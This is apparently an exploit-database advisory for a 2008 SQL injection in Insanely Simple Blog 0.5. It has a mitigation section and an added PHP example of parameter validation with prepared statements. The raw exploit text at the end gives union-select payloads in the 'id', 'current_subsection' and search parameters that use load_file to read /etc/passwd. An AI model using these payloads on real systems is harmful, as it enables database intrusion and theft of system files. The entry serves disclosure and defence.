Vendor: Insanely Simple Blog
By: unohope
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Insanely Simple Blog
Affected Version From: 0.5
Affected Version To: 0.5
Patch Exists: NO
Related CWE: N/A
CPE: a:insanely_simple_blog:insanely_simple_blog
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Insanely Simple Blog 0.5 (index) Remote SQL Injection Vulnerabilities

Insanely Simple Blog 0.5 is vulnerable to remote SQL injection. The 'index.php' script does not sufficiently sanitize user-supplied input in the 'id' and 'current_subsection' parameters, so an attacker can send a specially crafted HTTP request containing malicious SQL statements to the script. Successful exploitation can result in unauthorized access to the database, including sensitive information such as usernames and passwords stored in it.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized before it is used in SQL statements. Additionally, the application should be configured to connect to the database with the least-privileged account.
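
The mitigation above, shown as an added example that is not code from Insanely Simple Blog or from the advisory: values such as 'id' and 'current_subsection' are accepted only as positive integers, and every query uses bound parameters. The function names, the posts table and the in-memory SQLite database (which needs the pdo_sqlite extension and stands in for the application's database so the script runs offline) are assumptions.

```php
<?php
declare(strict_types=1);
// Hypothetical handler code, not taken from Insanely Simple Blog. The posts
// table, its columns and the SQLite stand-in database are assumptions.

/** Return a query parameter as a positive integer, or null if it is anything else. */
function int_param(array $query, string $name): ?int
{
    if (!isset($query[$name]) || !is_string($query[$name])) {
        return null; // missing, or an array such as id[]=1
    }
    $value = filter_var($query[$name], FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    return $value === false ? null : $value;
}

/** Look up one post; the id reaches the database only as a bound integer. */
function find_post(PDO $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT id, title FROM posts WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/** Search titles; the term is bound as data, so quotes in it stay literal. */
function search_posts(PDO $db, string $term): array
{
    $stmt = $db->prepare('SELECT id, title FROM posts WHERE title LIKE :term');
    $stmt->bindValue(':term', '%' . $term . '%', PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO posts (title) VALUES ('First post')");

// Constructed inputs: one well-formed id and one non-integer value.
foreach (['1', '-99 union select 0,1'] as $raw) {
    $id = int_param(['id' => $raw], 'id');
    $post = $id === null ? null : find_post($db, $id);
    echo json_encode($raw), ' => ',
        $id === null ? 'rejected (HTTP 400)' : json_encode($post), "\n";
}
// The quoted search term is compared as a literal string, not parsed as SQL.
echo count(search_posts($db, "x' union select 0,1")), " search results\n";
```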

Exploit-DB raw data:

  _____ _   _ _____  _____ _____ _____  
 /  ___| |_| |  _  \|  _  |  _  |_   _| 
 | (___|  _  | [_)_/| (_) | (_) | | |   
 \_____|_| |_|_| |_||_____|_____| |_|   
        C. H. R. O. O. T.  SECURITY  GROUP
        - -- ----- --- -- -- ---- --- -- - 
                     http://www.chroot.org

                          _   _ _ _____ ____ ____ __  _ 
        Hacks In Taiwan  | |_| | |_   _|  __|    |  \| |
        Conference 2008  |  _  | | | | | (__| () |     |
                         |_| |_|_| |_| \____|____|_|\__|
                                      http://www.hitcon.org


Title =======:: Insanely Simple Blog 0.5 (index) Remote SQL Injection Vulnerabilities

Author ======:: unohope [at] chroot [dot] org

IRC =========:: irc.chroot.org #chroot

ScriptName ==:: Insanely Simple Blog 

Download ====:: http://jaist.dl.sourceforge.net/sourceforge/insanelysimple2/insanely_simple_blog0.5.zip

Mirror ======:: http://www.badongo.com/file/9706939

______________________
[SQL Injection]

- {index.php} -

http://localhost/isblog/index.php?id=-99+union+select+0,1,2,3,4,5,6,load_file('/etc/passwd'),8/*

http://localhost/isblog/index.php?current_subsection=-99+union+select+0,1,2,3,4,5,6,load_file('/etc/passwd'),8/*

<form action="http://localhost/isblog/index.php?action=search" method="post">
<input type="hidden" name="term" value="-99' union select 0,1,2,3,4,5,6,load_file('/etc/passwd'),8/*">
<input type="submit" value="send">
</form>

______
[NOTE]

!! This is just for educational purposes, DO NOT use for illegal. !!

# milw0rm.com [2008-06-10]